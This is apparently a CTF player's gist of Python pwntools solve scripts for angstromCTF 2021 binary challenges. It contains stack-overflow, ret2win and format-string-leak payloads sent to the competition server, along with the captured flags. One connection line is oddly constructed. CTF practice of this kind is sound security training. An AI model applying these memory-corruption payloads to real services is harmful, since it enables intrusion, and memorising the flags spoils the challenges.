@blackbeard666
Last active April 8, 2021 14:12
ANGSTROM 21 PWN SCRIPTS (solved the four easy ones; also saving here the other challs I worked on that were solved by the other pwn guys from ARESx)
from pwn import *
#: CONNECT TO CHALLENGE SERVERS
#: Local ELF for symbols; interaction goes over the remote service.
binary = ELF('./raiid_shadow_legends', checksec=False)
# libc = ELF('./libc.so.6', checksec=False)
#: GDB SETTINGS -- breakpoint list for a local debugging session (play/terms
#: functions plus two offsets inside play).
breakpoints = [
    'break *play',
    'break *terms_and_conditions',
    'break *play + 493',
    'break *play + 178',
]
# gdb.attach(p, gdbscript='\n'.join(breakpoints))
# Local alternatives to the remote service (uncomment one instead):
# p = process('./raiid_shadow_legends')
# p = process('./raiid_shadow_legends', env={'LD_PRELOAD': libc.path})
p = remote("shell.actf.co", 21300)
#: EXPLOIT INTERACTION STUFF
def game_choice(choice):
    """Answer the menu prompt ending in ``do? `` with *choice*.

    Echoes everything received up to the prompt, then sends ``str(choice)``
    as one line.  Talks over the module-level tube ``p``.
    """
    prompt = p.recvuntil(b'do? ')
    print(prompt)
    p.sendline(str(choice))
def send_condition(agreement):
    """Reply to the ``conditions? `` prompt with *agreement* (str or bytes).

    Waits for the prompt on the module-level tube ``p`` before sending.
    """
    p.recvuntil(b'conditions? ')
    p.sendline(agreement)
def send_signature(sign):
    """Reply to the ``here: `` prompt with *sign* on the module-level tube ``p``."""
    p.recvuntil(b'here: ')
    p.sendline(sign)
def send_name(name):
    """Reply to the ``name: `` prompt with *name* on the module-level tube ``p``."""
    p.recvuntil(b'name: ')
    p.sendline(name)
#: PWN THY VULNS
#: Walk the menu: option 1, answer the terms prompt twice (first with four
#: filler bytes followed by 1337 as a little-endian qword, then 'yes'),
#: sign, give a name, pick option 2 and hand the session to the user.
terms_payload = cyclic(4) + p64(1337)
game_choice(1)
send_condition(terms_payload)
send_condition('yes')
send_signature('SIGNATURE')
send_name('_blackb3ard')
game_choice(2)
p.interactive()
#: actf{great_job!_speaking_of_great_jobs,_our_sponsor_audible...}
from pwn import *
#: CONNECT TO CHALLENGE SERVERS
#: Local ELF for symbols; interaction goes over the remote service.
binary = ELF('./checks', checksec=False)
# libc = ELF('./libc.so.6', checksec=False)
#: GDB SETTINGS -- single breakpoint inside main for local debugging.
breakpoints = ['break *main + 159']
# gdb.attach(p, gdbscript='\n'.join(breakpoints))
# Local alternatives to the remote service (uncomment one instead):
# p = process('./checks')
# p = process('./checks', env={'LD_PRELOAD': libc.path})
p = remote("shell.actf.co", 21303)
#: EXPLOIT INTERACTION STUFF
#: PWN THY VULNS
#: One input line: the NUL-terminated password, filler up to the checked
#: stack slots, then the five 32-bit values the binary's checks expect
#: (see the challenge summary below).
CHECK_VALUES = (17, 61, 245, 55, 50)
FILLER_LEN = 80 - 2 * 8
exploit = b"password123\x00"
exploit += cyclic(FILLER_LEN)
exploit += b''.join(p32(value) for value in CHECK_VALUES)
p.sendline(exploit)
p.interactive()
#: Challenge summary: control values in the stack to pass checks
#: actf{if_you_aint_bout_flags_then_i_dont_mess_with_yall}
from pwn import *
#: CONNECT TO CHALLENGE SERVERS
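#: Local ELF for symbols.
binary = ELF('./login', checksec=False)
# libc = ELF('./libc.so.6', checksec=False)
#: PWN THY VULNS
# Quiet pwntools: one process is spawned per attempt and the default
# log level would print start/stop lines 1000 times.
context.log_level = 'error'
ATTEMPTS = 1000
for attempt in range(ATTEMPTS):
    # The tube is a context manager, so the child is closed even when
    # recvall() raises; the original closed it only on the happy path.
    with process('./login') as p:
        p.sendline('\x00')
        print(attempt, p.recvall())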
#: actf{if_youre_reading_this_ive_been_hacked}
#: JUST BRUTEFORCE AND SEND NULL BYTE TO THE SHELL SERVER
#: https://ctftime.org/writeup/24905
from pwn import *
from Crypto.Util.number import long_to_bytes, bytes_to_long
#: CONNECT TO CHALLENGE SERVERS
#: Local ELF for symbols.
binary = ELF('./stickystacks', checksec=False)
# libc = ELF('./libc.so.6', checksec=False)
#: GDB SETTINGS -- breakpoint inside vuln for a local session.
breakpoints = ['break *vuln + 527']
# gdb.attach(p, gdbscript='\n'.join(breakpoints))
#: EXPLOIT INTERACTION STUFF
# One remote connection per leaked word; keep pwntools from logging each one.
context.log_level = 'error'
#: PWN THY VULNS
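#: PWN THY VULNS
#: Each connection sends one `%N$p` probe and the service echoes the value
#: after 'Welcome, '.  The echoed word is a hex integer whose bytes, read
#: little-endian, are a chunk of the flag.
FIRST_OFFSET, LAST_OFFSET = 33, 41


def _word_to_chunk(word):
    """Convert an echoed hex word (bytes, e.g. ``b'0x7d33...'``) to flag bytes.

    Uses ``int.to_bytes`` with the minimal width instead of
    ``bytes.fromhex(hex(v)[2:])[::-1]``: ``hex()`` drops leading zero
    nibbles, so a word whose top byte is below 0x10 yields an odd digit
    count and ``bytes.fromhex`` raises ``ValueError``.  For words that the
    old expression accepted the result is identical (little-endian bytes,
    leading zero bytes dropped).
    """
    value = int(word.decode(), 16)
    width = max(1, (value.bit_length() + 7) // 8)
    return value.to_bytes(width, 'little')


flag = b''
for offset in range(FIRST_OFFSET, LAST_OFFSET + 1):
    # The tube is closed by the context manager even if the split below
    # fails (no 'Welcome, ' in the output).
    with process if False else remote("shell.actf.co", 21820) as p:
        p.sendline(f"%{offset}$p")
        echoed = p.recvall().split(b'Welcome, ')[1].strip()
    flag += _word_to_chunk(echoed)
#: offset 42, which for some reason I can't parse properly
#: i'm too lazy to do it
# NOTE(review): the cause of the offset-42 failure is not visible from
# this script; the hard-coded tail below is kept as the author left it.
flag += bytes.fromhex("7d333935663161")[::-1]
print(flag)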
from pwn import *
#: CONNECT TO CHALLENGE SERVERS
#: Local ELF for symbols; interaction goes over the remote service.
binary = ELF('./tranquil', checksec=False)
# libc = ELF('./libc.so.6', checksec=False)
#: GDB SETTINGS -- breakpoint inside vuln for a local session.
breakpoints = ['break *vuln + 92']
# gdb.attach(p, gdbscript='\n'.join(breakpoints))
# Local alternatives to the remote service (uncomment one instead):
# p = process('./tranquil')
# p = process('./tranquil', env={'LD_PRELOAD': libc.path})
p = remote("shell.actf.co", 21830)
# Echo the banner up to the password prompt so it is consumed before sending.
banner = p.recvuntil(b'word: ')
print(banner)
#: EXPLOIT INTERACTION STUFF
#: PWN THY VULNS
#: One line: NUL-terminated password, 60 filler bytes, then the address
#: 0x401196 as a little-endian qword (value taken from the original script).
TARGET_ADDR = 0x401196
payload = b"password123\x00"
payload += cyclic(60)
payload += p64(TARGET_ADDR)
p.sendline(payload)
p.interactive()
#: actf{time_has_gone_so_fast_watching_the_leaves_fall_from_our_instruction_pointer_864f647975d259d7a5bee6e1}